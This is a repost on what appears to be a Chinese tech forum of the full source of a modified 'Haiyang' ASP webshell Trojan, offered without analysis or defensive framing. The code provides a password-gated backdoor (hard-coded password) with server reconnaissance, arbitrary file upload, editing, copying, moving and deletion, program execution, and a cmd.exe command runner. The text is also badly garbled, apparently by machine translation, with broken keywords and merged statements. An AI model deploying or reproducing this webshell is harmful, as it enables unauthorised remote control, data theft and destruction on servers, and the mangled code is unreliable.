Modified Haiyang ASP Trojan

xiaoxiao2021-03-06  93

<% @ Language = "vbscript" CODEPAGE = "936"%> 111 </ title> <style> body {font-family: Song; font-size: 10pt} Table {font-family: Song; font- Size: 9pt} a {font-family: Song; font-size: 9pt; color: # 000000; Text-Decoration: none} a: hover {font-family: Song; Color: # 807123; text-decoration: none} Input {Border-Right: # 888888 1px solid; border-top: # 888888 1px solid; background: #ffffff; border-left: # 888888 1px solid; border-bottom: # 888888 1px solid; font-family: "verdana" , "Arial" font-color: #ffffff; font-size: 9pt; </ style> <% if request ("up") = 1 THEN%> <% server.scripttimeout = 5000%> <script runat = Server Language = VBSCRIPT> dim Data_5xsoftClass upload_5xsoftdim objForm, objFile, VersionPublic function Form (strForm) strForm = lcase (strForm) if not objForm.exists (strForm) thenForm = "" elseForm = objForm (strForm) end ifend functionPublic function File (strFile) strFile = LCASE (STRFILE) IF NOT ObJFILE.EXISTS (STRFILE) THENSET file = new fileinfoelseset file = objfile (strfile) end = objfile (STRFILE) end = objfile (STRFILE) End IFEND FUNCTIONPRIVATE SUB CLASS_INITIALIZEDIM RE questData, sStart, vbCrlf, sInfo, iInfoStart, iInfoEnd, tStream, iStart, theFiledim iFileSize, sFilePath, sFileType, sFormValue, sFileNamedim iFindStart, iFindEnddim iFormStart, iFormEnd, sFormNameset objForm = Server.CreateObject ( "Scripting.Dictionary") set objFile = Server .CreateObject ( "Scripting.Dictionary") if Request.TotalBytes <1 then Exit Subset tStream = Server.CreateObject ( "") set Data_5xsoft = Server.CreateObject ( "") Data_5xsoft.Type = 1Data_5xsoft.Mode =</p> <p>3Data_5xsoft.OpenData_5xsoft.Write Request.BinaryRead (Request.TotalBytes) Data_5xsoft.Position = 0RequestData = Data_5xsoft.ReadiFormStart = 1iFormEnd = LenB (RequestData) vbCrlf = chrB (13) & chrB (10) sStart = MidB (RequestData, 1, InStrB ( iFormStart, RequestData, vbCrlf) -1) iStart = LenB (sStart) iFormStart = iFormStart iStart 1while (iFormStart 10) <iFormEndiInfoEnd = InStrB (iFormStart, RequestData, vbCrlf & vbCrlf) 3tStream.Type = 1tStream.Mode = 3tStream .OpenData_5xsoft.Position = iFormStartData_5xsoft.CopyTo tStream, iInfoEnd-iFormStarttStream.Position = 0tStream.Type = 2tStream.Charset = "gb2312" sInfo = tStream.ReadTexttStream.CloseiFormStart = InStrB (iInfoEnd, RequestData, sStart) iFindStart = InStr (22, sInfo , "Name =" ", 1) 6Ifindend = INSTR (ifindstart, sinfo," "" ", 1) sformname = LCase (MID (SINFO, IFINDSTART, IFINDENDSTART) IF INSTR (45, SINFO," FILENAME = "" ", 1)> 0 THENSET Thefile = new fileinfoifindstart = INSTR (ifindend, sinfo," filename = "", 1) 10Ifindendnd = INSTR (ifindstart, sinfo, "" "", 1) sfilename = MID ( s info, iFindStart, iFindEnd-iFindStart) theFile.FileName = getFileName (sFileName) theFile.FilePath = getFilePath (sFileName) iFindStart = InStr (iFindEnd, sInfo, "Content-Type:", 1) 14iFindEnd = InStr (iFindStart, sInfo, vbCr) theFile.FileType = Mid (sinfo, iFindStart, iFindEnd-iFindStart) theFile.FileStart = iInfoEndtheFile.FileSize = iFormStart -iInfoEnd -3theFile.FormName = sFormNameif not objFile.Exists (sFormName) thenobjFile.add sFormName, theFileend ifelsetStream.Type =</p> <p>1tStream.Mode = 3tStream.OpenData_5xsoft.Position = iInfoEndData_5xsoft.CopyTo tStream, iFormStart-iInfoEnd-3tStream.Position = 0tStream.Type = 2tStream.Charset = "gb2312" sFormValue = tStream.ReadTexttStream.Closeif objForm.Exists (sFormName) thenobjForm (sFormName ) = objForm (sFormName) & "," & sFormValueelseobjForm.Add sFormName, sFormValueend ifend ifiFormStart = iFormStart iStart 1wendRequestData = "" set tStream = nothingEnd SubPrivate Sub Class_Terminateif Request.TotalBytes> 0 thenobjForm.RemoveAllobjFile.RemoveAllset objForm = nothingset objFile = nothingData_5xsoft .Closeset Data_5xsoft = nothingend ifEnd SubPrivate function GetFilePath (FullPath) If FullPath <> "" ThenGetFilePath = left (FullPath, InStrRev (FullPath, "/")) ElseGetFilePath = "" End IfEnd functionPrivate function GetFileName (FullPath) If FullPath <> " "ThenGetFileName = mid (FullPath, InStrRev (FullPath," / ") 1) ElseGetFileName =" "End IfEnd functionEnd ClassClass FileInfodim FormName, FileName, FilePath, FileSize, FileType, FileStartPrivate Sub class_ InitializeFileName = "" FilePath = "" FileSize = 0FileStart = 0FormName = "" FileType = "" End SubPublic function SaveAs (FullPath) dim dr, ErrorChar, iSaveAs = trueif trim (fullpath) = "" or FileStart = 0 or FileName = " "or right (fullpath, 1) =" / "then exit functionset dr = CreateObject (" Adodb.Stream ") dr.Mode = 3dr.Type = 1dr.OpenData_5xsoft.position = FileStartData_5xsoft.copyto dr, FileSizedr.SaveToFile fullPath, 2dr .Closset DR = Nothingsaves =</p> <p>falseend functionEnd Class </ SCRIPT> <% dim upload, file, formName, formPath, iCountset upload = new upload_5xsoftif upload.form ( "filepath") = "" thenresponse.write "Please enter the directory you want to upload!" set upload = nothingresponse.endelseformPath = upload.form ( "filepath") if right (formPath, 1) <> "/" then formPath = formPath & "/" end ifiCount = 0for each formName in upload.objFormnextresponse.write "<br>" for each formName in upload.objFileset file = upload.file (formName) if file.FileSize> 0 thenfile.SaveAs Server.mappath (formPath & file.FileName) response.write "<center>" & file.FilePath & file.FileName & "(" & file.FileSize & " ) => "& form" upload success! </ center> <br> "iCount = iCount 1END IFSET FILE = NothingNextSet Upload = NothingResponse.write" <center> "& iCount &" file upload end! </ center> " Response.write "<center> <br> <a href=""javascript:History.back();"> <font color = '# d00000'> Return to the previous page </ font> </a> </ Center> "Elseurl = Request.serverVariables (" URL ") 'Modify the following to your password if trim (Request.form (" Password ") =" "ThenResponse.cookies "Passwor D ") =" Allen "Response.Redirect" "& URL &" "Else if Request.Cookies (" Password ") <>" Allen "thencall login () response.Endend ifselect Case Request (" ID ") CASE" Edit "CALL Edit () Case "Upload" Call Upload () Case "DIR" Call Dir () Case Elsecall Main () end selectend ifsub login () for i =</p> <p>0 to 25on error resume nextIsObj = falseVerObj = "" dim TestObjset TestObj = server.CreateObject (ObjTotest (i, 0)) If -2147221005 <> Err thenIsObj = TrueVerObj = TestObj.versionif VerObj = "" or isnull (VerObj) then VerObj = Testobj.aboutend ifobjtotest (i, 2) = isobjobjtotest (i, 3) = Verobjnext%> <body> <center> <table border = 0 width = 500 cellspacing = 0 cellpadding = 0 bgcolor = "# b8b8b8"> <TR > <TD> <table border = 0 width = 100% cellspacing = 1 cellpadding = 0> <tr bgcolor = "# eeeeee" height = 18> <td width = "59%" Align = Left> server name </ td> <td width = "41%" BGColor = "# eeeeee"> <% = Request.serverVariables ("server_name")%> </ td> </ tr> <tr bgcolor = "# ffffff" Height = 18> <TD Align = Left> Server IP </ TD> <TD> <% = Request.ServerVariables ("local_addr")%> </ td> </ tr> <tr bgcolor = "# ffffff" Height = 18> <TD align = LEFT> server port </ td> <TD> <TD> <TD> <SERVARIABLES ("Server_Port")%> </ td> </ tr> <tr bgcolor = "# ffffff" Height = 18> <TD align = left> Server time </ td> <TD> <% = no%> </ td> </ tr> <tr bgcolor = "# fffff" height = 18> <TD align = left> This file absolute path </ td> < TD> <% = server.mappath (Request.ServerVariables ("Script_name"))%> </ td> </ tr> <tr bgcolor = "# fff" Height = 18> <TD align = left> server CPU number </ td> <td> <% = request.serverVariables ("Number_Of_Processors")%></p> <p></ TD> </ TR> <TD ALIGHT = 18> <TD Align = LEFT> Server Operating System </ TD> <TD> <% = Request.ServerVariables ("OS")%> </ td> </ tr> <tr bgcolor = "# eeeeee" height = 18> <TD align = left> <font class = fonts> server operation speed test </ font> </ td> <TD> Completion time < / TD> </ tr> <tr bgcolor = "# fff" Height = 18> <TD align = left> Allen's computer (521M, Athlon2200 ) </ td> <td> 186.6 millisecond </ td> </ tr> <tr bgcolor = # ffffff "Height = 18> <TD align = left> China Channel Virtual Host (2002-08-06) </ TD> <TD> 610.9 millisecond </ td> </ tr> <tr bgcolor = "#Ffffff" Height = 18> <TD align = left> Western Digital WEST263 Host (2002-08-06) </ TD> <TD> 357.8 ms </ td> </ tr> <tr bgcolor = "# ffffff" Height = 18> <% DIM T1, T2, LSABC, THIMET1 = Timerfor I = 1 to 500000lsAbc = 1 1NEXTT2 = TIMERTHETIME = CSTR (INT (((T2-T1) * 10000) 0.5) / 10)%> < TD align = left> <font color = red> This server you are using </ font> </ td> <td> <font color = red> <% = THETIME%> millisecond </ font> </ td> </ tr> </ table> </ td> </ tr> </ table> <html> <body> <center> <table> <% response.write <font class = fonts> can only perform one action at a time :) Do not need FSO Support & When Server Time </ font>%> <% Response.Write Now ()%> <br> <form action = "</ RTI> <RTI ID = 0.0> </ RTI> </ RTI> < %> "Method = "Pos"> <input type = text name = text value = "<% = szcmd%>> <</p> <p>Font class = fonts> Enter the directory you want to browse, finally add / </ font> <br> <input type = text name = text1 value = "<% = SZCMD1%>> Copy <input type = text name = text2 Value = "<% = szcmd2%>"> <br> <input type = text name = text3 value = "<% = szcmd3%>"> Move <input type = text name = text4 value = "<% = szcmd4% > "> <br> path: <input type = text name = text5 value =" <% = szcmd5%> "> program: <input type = text name = text6 value =" <% = szcmd6%> "> <br > <input type = Submit name = sb value = Send command class = input> </ form> </ table> </ center> </ body> </ html> <% szcmd = request.form ("text") ' Directory Browsing IF (Szcmd <> ") THENSET Shell = Server.createObject (" shell.application ") 'Establishing shell object set FOD1 = shell.namespace (szcmd) Set FoduItems = FOD1.ITEMSFOR EACH CO in FodItemsResponse.write" < Font Color = Red> "& Co.Path &" ----- "& Co.Size &" </ font> <br> "Nextend IF%></p> <p><% szcmd1 = request.form ("text1") 'directory copy, can not be file copy SZCMD2 = Request.form ("text2") if szcmd1 <> "" and szcmd2 <> "" "" "" and szcmd2 <> "" "" "" "and szcmd2 <>" "" "and szcmd2 <>".. Shell.Application ") 'Established shell object set FOD1 = shell1.namespace (SZCMD2) for i = len (szcmd1) to 1 Step -1if MID (SZCMD1, I, 1) =" / "ThenPath = Left (Szcmd1, I- 1) EXIT Forend ifnextif Len (PATH) = 2 THEN PATH = PATH & "/" Path2 = Right (SZCMD1, LEN (SZCMD1) -i) SET FOD2 = shell1.namespace (PATH) SET FODITEM = FOD2.PARSENAME (PATH2) FOD1.COPYHERE FODITEMRESPONSE.WRITE "Command Command Comcast" "END IF%> <% SZCMD3 = Request.form (" Text3 ") 'Directory Mobile SZCMD4 = Request.form (" Text4 ") IF SZCMD3 <>" "and szcmd4 < > "" "" TENSET shell2 = server.createObject ("shell.application") 'Established shell object set FOD1 = shell2.namespace (SZCMD4)</p> <p>For i = len (szcmd3) to 1 Step -1if MID (SZCMD3, I, 1) = "/" TENPATH = Left (SZCMD3, I-1) EXIT Forend ifnext</p> <p>IF LEN (PATH) = 2 THEN PATH = PATH & "/" Path2 = Right (SZCMD3, LEN (SZCMD3) -i) SET FOD2 = shell2.namespace (PATH) SET FODITEM = FOD2.PARSENAME (PATH2) FOD1.MOVEHERE FODITEMRESPONSE .write "Command Commist" "END IF%> <% SZCMD5 = Request.form (" Text5 ") 'Execute the program to specify the path SZCMD6 = Request.form (" text6) if szcmd5 <> "" and szcmd6 <> "" TenSet shell3 = server.createObject ("shell.application") 'Established shell object shell3.namespace (szcmd5) .ItemBRESPONSE.WRITE "Command Comcast Co.," Command completion success! "END IF%></p> <p><form method = "PASSWORD: <input type =" password "name =" 20 "> <input type =" submit "value =" login "> <input type =" 20 "> <input type =" 20 "> <input type =" submit "value =" login "> <infut type =" / center> </ form> </ body> <% end sub%> <% Sub main () 'Modify the following URLPath to change the actual urlurpath = "http:// localhost" DIM CPATH, LPATHSET FSOBROWSE = CreateObject ("Scripting.filesystemObject") if Request ("Path") = "" "1Path = "/" Elselpath = Request ("path") & "/" end ifif request ("attrib") = "true" life = lpathattrib = "True" elsecpath = server.mappath (lpath) attrib = "" "END IF%> <html> <script language =" javascript "> function crfile (ls) {if (ls ==") {Alert ("Please enter File name! ");} Else { (" <% = url%>? Id = edit ")%> & creat = yes & pat =% = lpath%> ls) } Return False;} Function CRDIR (LS) {if (ls == ") {Alert (" Please enter the file name! ");} else {window.Open (" <% = url%>? id = Dir & Attrib = <% = Request ("Attrib")%> & op = Creat & Path = <% = lpath%> " LS);} Return False;} </ script> <script language =" vbscript "> SUB RMDIR (LS) IF Confirm ("Do you really want to delete this directory!" & chr (13) & chr (10) & "directory is:" & ls) Thenwindow.Open ("<% = url%>? id = DIR & path =" & ls & "& op = Del & attrib = <% = r Equest ("attrib")%> ") end ifend subsub copyfile (sfile) DFILE = INPUTBOX (" &</p> <p>CHR (13) & chr (10) & "Source File:" & Sfile & Chr (13) & Chr (10) & "Please enter the file name of the target file:" & Chr (13) & chr (10) & "Xu Zi Path, to be based on you Current path mode. Note: Absolute path example C: / or C: / Both ") DFILE = TRIM (DFILE) Attrib =" <% = Request ("attrib")%> "IF DFILE <>" "THENIF INSTR (DFILE, ":") OR INSTR (DFILE, "/") = 1 ThenLP = "" IF INSTR (DFILE, ":") And attrib <> "True" Tenalert "Sorry, you can't use in relative path mode Absolute Path "& Chr (13) & Chr (10) &" Error Path: ["& Dfile &"] "EXIT SUBEND IFELSELP =" <% = lpath%> "end (" & URL & "? Id = Edit & Path =" SFILE "& op = COPY & Attrib =" Attrib "& dpath =" lp dfile) Elsealert "You did not enter the file name!" end ifnd sub </ script> <body bgcolor = "# f5f5f5> <Table cellspacing = 1 cellpadding = 3 width = "750" align = centerbgcolor = # b8b8b8 border = 0> <tbody> <tr> <tdheight = 22 colspan = "4" bgcolor = "# eeeeee"> Switching disk: <% for Each Thing in fsobrowse. DrivesResponse.write "<a href='"&ürl&"?path="&thing.driveletter&"" & think.driveletter & "disk: </a>" Next%> Native LAN address: <% set OSCript = Server.createObject ("") set OSCRIPTNET = Server.createObject ("") set ofilesys = server.createObject ("scripting.filesystemObject ")%> <% =" // "& oscriptnet.computername &" / "& oscriptnet.username%> </ td> <</p> <p>/ TR> <TD colspan = "4" bgcolor = "# ffffff"> <% if request ("attrib") = "true" tellnse.write <a href = '"& url &"> <font color =' # D00000 '> Click to switch to the relative path editing mode </ font> </a> "elsersponse.write" <a href="&url"?ttrib=true' <font color = '# d00000'> Click to switch to absolute Path Editing Mode </ font> </a> "END IF%> Absolute path: <% = cpath%> Current browsing directory: <% = lpath%> </ td> </ tr> <tr> <td height = 22 COLSPAN = "4" BGColor = "# eeeeee"> <form name = "form1" method = "post" action = "<% = url%>"> Browse directory: <input type = text "name =" PATH "size =" 30 "value =" c: "> <input type =" hidden "name =" attrib "value =" true "> <input type =" submit "name =" submit "value =" Browse Directory "> 〖Use absolute path to support the LAN address! </ Td> </ form> </ tr> <tr> <td color = "4" bgcolor = "# ffffff"> <form name = "form1" method = "post" action = "<% = URL% >? UP = 1 "encType =" multipart / form-data "> <input type =" hidden "name =" act "value =" upload "> Upload to: <input name =" filepath "type =" text "Value = "/" size = "5"> file address: <input type = "file" name = "file1" value = "> <input type =" submit "name =" submit "value =" Upload File "> 〖 Please use the relative path! 〗 </ Td> </ form> <</p> <p>/ TR> <tr bgcolor = "# eeeeee"> <td colspan = "4"> <% on error resme nextSet Oscript = server.createObject ("") set oscriptionnet = server.createObject ("" ) Set ofilesys = server.createObject ("scripting.filesystemObject") szcmd = request.form (". Cmd") IF (szcmd <> ") THENSZTEMPFILE =" C: / "& OfileSys.getTempname () Call ("cmd.exe / c" & szcmd & "> & sztempfile, 0, true) set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) end if%> <form action =" <% = request. ServerVariables ("URL")%> "Method =" post "> <input type = text name =". Cmd "size = 40 value =" <% = szcmd%>> <input type = submit value = "executor "> Please use the absolute path and make sure you have the corresponding permissions! <% IF (IsObject (ofile) "Then Error ResMleNCode (Ofile.Readall) Ofile.Closecall Ofilesys.deletefile (SztempFile, True) End IF%> </ TD> </ form> </ tr > <Tr bgcolor = # ffffff> <td height = 22 colspan = "4"> <form name = "newfile" onSubmit = "Return Crfile (newfile.filename.value);"> <input type = "text" name = "filename" size = "40"> <input type = "Submit" value = "New File"> <input type = "value =" New Directory "οnclick =" crdir (newfile.filename.value) "> 〖 New files and new directorys cannot be the same name </ td> <td height = 22 width = "26%" rowspan = "2" valign = "top" bgcolor =</p> <p>#eeeeee> <% dim theFolder, theSubFoldersif fsoBrowse.FolderExists (cpath) thenSet theFolder = fsoBrowse.GetFolder (cpath) Set theSubFolders = theFolder.SubFoldersResponse.write "<a href = '" & url & "? path =" & Request ( "oldpath" ) & "& attrib =" & attrib "> <font color = '# ff8000'> ■ </ font> <font color = 'ff2222'> Back level directory </ font> </a <br>" for Each x in theubfoldersResponse.write "<a href="&lpath&lpath="?path="&oldpath=" "&request" ■ </ font> "& &" </a> <a href="&chr(34 )&"javascript: RMDir ('"&lpath& "')"&chr (34 )&"> <font color = ' # Ff8000 '> × </ font> Delete </a> <br> "Nextend IF%> </ TD> <TD Width =" 45% "BGColor = # eeeeee> file name (mouse moving to file name) Properties of files) </ td> <td width = "11%" BGColor = # eeeeee> Size (byte) </ td> <TD width = "18%" BGCOLOR = # eeeeee> File operation </ td> < / TR> <TR> <TD height = 200 colspan = "3" valign = "top" bgColor = # ffffff> <% dim theFilesif fsoBrowse.FolderExists (cpath) thenSet theFolder = fsoBrowse.GetFolder (cpath) Set theFiles = theFolder. FILESRESRESPONSE.WRITE "<Table Border = '0' width = '100%' Cellpadding = '0'>" for Each x in Thefilesif Request ("Attrib" = "True"</p> <p>THENSHOWSTRING = "<strong>" & "</ strong>" Elseshowstring = "<a href = '" & urlpath & lpath "" & "& x.Type & Chr (10) &" Properties "& X. Attributes & Chr (10) & "Time:" & x.dateLastModified & "'Target =' _ blank '> <strong>" & & "<Strong> </a>" end ifresponse.write "<Tr> <TD width =' 50%> <font color = '# ff8000'> □ </ font> "& showstring &" </ td> <td width = '8%> "& x.size &" </a </ td> <TD Width = '20%> <a href='"&url "??id=EDit&path="und=="&ttrib& "'target='_blank'> editor </a> <a href = '" & url & "? ID = Edit & Path = "& lpath & &" & "&" & "& = DEL & Attrib =" & Attrib "'Target =' _ Blank '> Delete </a> <a href='# οnclick=copyfile('"&lpath& "')> Copy < / a> </ td> </ tr> "nextend ifresponse.write" </ table> "%> </ td> </ tr> </ tbody> </ table> <% end subsub Edit () if Request "op") = "del" thenif Request ( "attrib") = "true" thenwhichfile = Request ( "path") elsewhichfile = server.mappath (Request ( "path")) end ifSet fs = CreateObject ( "Scripting.FileSystemObject ") SET thisfile =</p> <p>fs.getfile (Whichfile) thisfile.delete TrueResponse.write "<br> <center> Delete success! To refresh to see the effect. </ center>" Elseif Request ("OP") = "Copy" THENIF Request ("Attrib ") =" true "thenfile = Request (" path ") DSFile = Request (" DPATH ") Elsewhichfile = Server.mappath (Request (" Path ")) DSFile = Server.MAppath (Request (" DPath ")) End Ifset FS = CreateObject ("scripting.filesystemObject") SET thisfile = fs.getfile (Whichfile) thisfile.copy dsfileresponse.write "<center> <p> Source file:" Whichfile "</ center>" response.write "<center > <br> Purpose File: " DSFile " </ center> "Response.write" <center> <br> Copy Success! To refresh to see the effect! </ p> </ center> "elseif request.form "Text") = "" THENIF Request ("creat") <> "yes" thenif repest ("attrib") = "true" thenfile = request ("path") elsewhichfile = server.mappath (Request ("path") ) end ifSet fs = CreateObject ( "Scripting.FileSystemObject") Set thisfile = fs.OpenTextFile (whichfile, 1, False) counter = 0thisline = thisfile.readallthisfile.Closeset fs = nothingend if%> <form method = "POST" action = "& URL &"? id = Edit "> <input type =" hidden "name =" attrib "value =" <% = Request ("attrib")%>> <br> <Table cellspacing = 1 cellpadding = 3 width = "750" align = centerbgcolor = # b8b8b8 border = 0> <tbody> <Tr> <TdHeight = 22 BGColor = "# eeeeee"> <</p> <p>DIV align = "center"> </ div> </ td width = "100%" height = 22 bgcolor = "# ffffff"> file name: <input type = "text" Name = "size =" 45 "value =" <% = Request ("path")%> "readonly> </ td> </ tr> <tr> <tdheight = 22 bgcolor =" # eeeeee "> < Div align = "center"> <textarea rows = "25" name = "text" cols = "105"> <% = thisline%> </ textarea> </ div> </ td> </ tr> <TR> <TdHeight = 22 BGColor = "# ffffff"> <div align = "center"> <input type = "submit" value = "submit" name = "b1"> <input type = "reset" value = "restore" Name = "B2"> </ div> </ td> </ tr> </ table> </ form> <% elseif request ("attrib") = "true" thenfile = request ("path") elsewhichfile = Server. mappath (Request ( "path")) end ifSet fs = CreateObject ( "Scripting.FileSystemObject") Set outfile = fs.CreateTextFile (whichfile) outfile.WriteLine Request ( "text") outfile.closeset fs = nothingResponse.write "<center > Modify success! To refresh to see the effect! </ Center> "End ifend ifnd IFEND SUBEND IF%> <% SUB DIR () if Request (" OP ") =" DEL "Thenif Request (" attrib ") =" True "thewhichdir = request (" path ") elsewhichdir = server.mappath (Request (" path ")) end ifset fs = creteObject (" Scripting.filesystemObject ") fs.deletefolder whichdir, trueresponse.write" <center> Delete success! To refresh to see the effect,</p> <p>Deleted directory: <b> "& shichdir &" </ b> </ center> "Elseif Request (" op ") =" Creat "Thenif Request (" attrib ") =" true "thenwaredir = request (" path ") ElseWhichdir = server.mappath (Request ("Path")) end ifset fs = createObject ("scripting.filesystemObject") fs.createfolder whichdirresponse.write "<center> established success! To refresh to see the effect, the creation of the catalog is: <b> "& shichdir &" </ b> </ center> "End IFEND IFEND SUB%> <br> </ body> </ html></p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="121542" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.047</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = '37_2FpZDN7umiHUD6BzD_2BmbGQJXYfZt4Hq3QaKnUkTBnBoDVRZR10vxiEqnqA_2Ba5gbErLB3HfxJnNXspKXiyGdMg_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>